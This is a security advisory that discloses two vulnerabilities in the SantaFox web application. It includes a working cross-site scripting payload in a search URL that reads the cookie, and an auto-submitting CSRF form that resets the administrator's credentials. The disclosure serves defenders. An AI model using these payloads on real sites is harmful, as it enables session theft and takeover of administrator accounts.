Multiple Vulnerabilities in SantaFox

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SantaFox which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

1. Cross-site scripting (XSS) vulnerability in SantaFox: CVE-2010-3463
   The vulnerability exists due to input sanitation error in the “search” parameter in modules/search/search.class.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is authorized. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
   Exploitation example:
   http://host/search.html?search=1"><script>alert(document.cookie)</script>&x= 0&y=0

2. Cross-site request forgery (CSRF) in SantaFox: CVE-2010-3464
   The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
   Exploitation example:
   <form action=“http://host/admin/index.php?action=set_left_menu&amp;leftmenu=save_admin &id=-1” method=“post” name=“main” >
   <input type=“hidden” name=“login” value=“Admin” />
   <input type=“hidden” name=“full_name” value=“Admin” />
   <input type=“hidden” name=“pass” value=“Admin” />
   <input type=“hidden” name=“lang” value=“en” />
   <input type=“hidden” name=“codepage” value=“” />
   <input type=“hidden” name=“enabled” value=“on” />
   <input type=“hidden” name=“select_group[1]” value=“on” />
   <input type=“hidden” name=“select_group[2]” value=“on” />
   </form>
   <script>
   document.main.submit();
   </script>